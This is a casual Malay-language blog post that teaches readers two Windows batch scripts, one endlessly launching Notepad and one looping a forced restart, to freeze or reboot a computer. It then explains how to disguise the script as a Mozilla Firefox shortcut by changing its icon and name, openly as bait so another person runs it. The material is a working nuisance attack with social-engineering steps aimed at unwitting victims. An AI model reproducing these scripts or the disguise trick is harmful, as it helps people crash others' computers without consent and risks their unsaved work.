Pages

Banner 468 x 60px

boyfren hensem
anak luar nikah
kahwin lari
 

Tuesday, January 18, 2011

hack pc diorang!!! hack!!

0 orang comel komen~
hack lagi? aq sbenarnya x la gila sangat dengan hack ne... aq sebenarnya cadang dah x nak buat entri pasal hack ne... ya la... takut korang boring lak baca blog ne... tp ada cerita disebalik virus ne.... hehehe...



camne, untuk pengetahuan korang, baru2 ne aq dah join satu forum yang diorang bagi nama fanfare forum...
aq dijemput untuk membuat entri la kat sana (special thanks to ustadenapio)... ngam2 pulak kat forum tu ada satu ruang pasal hacking... ruang tu still kosong, so aq post la pasal Fork Bomb kat forum tu...

beberapa jam lepas tu, aq telah mendapat satu komen yang aq rasa sangat kool dan macho daripada seorang moderator kat situ, nama dia codeshift3r... dia cadangkan 2 kod hacking kat aq...

so, aq dengan amat bengongnya mula rasa kool sambil tergugat (bergelut ngan ego la ne).... jadi aq pun dengan tidak semena-mena try la salah satu kod tu, dan...

TAHNIAH CODESHIFT3R!!!!! komputer aq jam.... hahahahaha..... aq terpaksa cabut bateri aku & start balik laptop aq.... hahahahahaha..... tapi laptop aq ok da...aq telah di'hack' oleh diri sendiri.... bengongnya aq....

ya la....ya la... kejap la... aq nak ajar korang la ne..... hack tu camni....



a) notepad spamming

1. bukak notepad > taip kod di bawah ne :

@echo off
cls
:a
start notepad.exe
goto :a



2. click file (atas sebelah kiri) > save as


korang letak la nama benda ne sebagai '.bat', contohnya spam.bat


pastikan korang taw mana benda tu akan di save...sebaik-baiknya korang letak kat desktop la...


3. click save, DONE!!


4. kalau nak buat umpan supaya orang lain click benda tu, macam besa la... right click > create shortcut > tukar ikon shortcut tu (change icon) dan rename shortcut tu.. untuk korang2 yang nak letak ikon tu jadi ikon mozilla firefox tapi x tau kat mana :


4.1. masa korang tekan change icon tu, kan keluar satu benda (aq x tau nak panggil apa), atas tu ada satu ruang yang korang boleh taip (yang ada button browse tu..).... masukkan kod ne:


%ProgramFiles%\mozilla firefox\firefox.exe


aq tumpukan ngan mozilla sebab aq rasa ne la antara umpan yang best untuk mangsa korang (macam nak pegi mancing lak...)


(b) shutdown


aq rasa virus ne sepupu fork bomb gak... tp aq gtaw gak la kat korang...


1. caranya sama ngan virus kat atas, tapi korang ganti kod kat atas tu ngan kod ne :


@echo off
:a
cls
start shutdown -r

cls
goto :a



senang kan? selamat mencuba!!!


p/s: hack 'shutdown' ne la yang aq da try.... korang boleh try la.... tapi pastu cabut la bateri/ plug korang & restart la pc korang.....hehehehehhe...


x paham2 gak??? aduh... tgk la video ne :



video


Blogger Templates

0 orang comel komen~: